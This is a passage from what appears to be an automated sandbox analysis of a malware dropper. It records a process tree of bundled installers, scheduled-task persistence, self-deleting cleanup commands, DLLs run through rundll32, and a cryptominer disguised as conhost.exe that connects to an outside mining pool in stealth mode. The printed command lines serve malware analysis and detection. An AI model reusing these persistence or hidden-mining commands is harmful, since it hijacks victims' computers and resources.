                                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                                    PID:6772
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:4160
                                                                                                                                                                              • C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
                                                                                                                                                                                "C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:2660
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-C5N9P.tmp\stats.tmp
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-C5N9P.tmp\stats.tmp" /SL5="$20340,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:188
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-D7CI6.tmp\Setup.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-D7CI6.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:808
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:6576
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:6644
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Services.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Services.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        PID:7132
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:5604
                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
                                                                                                                                                                                              9⤵
                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                              PID:5788
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:7064
                                                                                                                                                                                            • C:\Windows\System32\conhost.exe
                                                                                                                                                                                              C:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:5060
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0744FE84\Fri19b9b73e83c948b1d.exe
                                                                                                                                                                                  Fri19b9b73e83c948b1d.exe /mixone
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:2880
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 656
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:4364
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 680
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:4480
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 684
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:4804
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 708
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:4804
                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:4044
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:4112
                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                  PID:5736
                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:4780
                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                  PID:4744
                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  PID:196
                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 7266E267290D0AE856BBBDCB9500E41F C
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:5632
                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding F47032CDED0A8989EB28AE751514AE22
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:4220
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:6152
                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 92C055C11CB3211A12D7397113C255C1 E Global\MSI0000
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:6628
                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 33D3619C24D7E35B8DE0BDA72CCCBA28 C
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:6468
                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding E069F1C5988AA710C8EFA8B18259CD85
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:5376
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:5172
                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding F6BC266EA5E853842FB6781AEA5D5C55 E Global\MSI0000
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:4184
                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding EFEFBD6FBF245D9CB110D7253A0E97B9 C
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:5308
                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding DF153A235FCA7B8FA6B32EDFDF2F9F22
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                      PID:4776
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                      PID:6128
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                        PID:5212
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--MEcn9oiWFJ"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                          PID:5368
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e0,0x1e4,0x1e8,0x198,0x1ec,0x7ffee5329ec0,0x7ffee5329ed0,0x7ffee5329ee0
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:5016
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff687fb4e60,0x7ff687fb4e70,0x7ff687fb4e80
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:6340
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1624,18017738271141036771,1135462818892709408,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5368_407673449" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1640 /prefetch:2
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:5636
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,18017738271141036771,1135462818892709408,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5368_407673449" --mojo-platform-channel-handle=1828 /prefetch:8
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:6564
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,18017738271141036771,1135462818892709408,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5368_407673449" --mojo-platform-channel-handle=2152 /prefetch:8
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:6220
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1624,18017738271141036771,1135462818892709408,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5368_407673449" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2640 /prefetch:1
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                      PID:6624
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1624,18017738271141036771,1135462818892709408,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5368_407673449" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1636 /prefetch:2
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:6296
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,18017738271141036771,1135462818892709408,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5368_407673449" --mojo-platform-channel-handle=1796 /prefetch:8
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:6008
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,18017738271141036771,1135462818892709408,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5368_407673449" --mojo-platform-channel-handle=3324 /prefetch:8
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:3800
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,18017738271141036771,1135462818892709408,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5368_407673449" --mojo-platform-channel-handle=3096 /prefetch:8
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                                                                            PID:4348
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,18017738271141036771,1135462818892709408,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5368_407673449" --mojo-platform-channel-handle=3224 /prefetch:8
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:1684
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,18017738271141036771,1135462818892709408,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5368_407673449" --mojo-platform-channel-handle=2324 /prefetch:8
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:6844
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_F7A7.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:6772
                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding ECF4603CD08769537B2EC34BB7BCF0BF C
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:1352
                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 92774489B4BE305269C43371FDF7A711
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                              PID:5932
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                              PID:6576
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                PID:1568
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:6848
                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                              PID:2708
                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                PID:5268
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                              PID:5764
                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                              PID:7140
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:6740
                                                                                                                                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                              PID:6388
                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                PID:1728
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                              PID:6928
                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                              PID:4484
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                              PID:6228
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:6424
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:5408
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:6192
                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                              PID:6876
                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{69006bfd-318a-4a47-9fc0-f30bed12d860}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                • Modifies data under HKEY_USERS
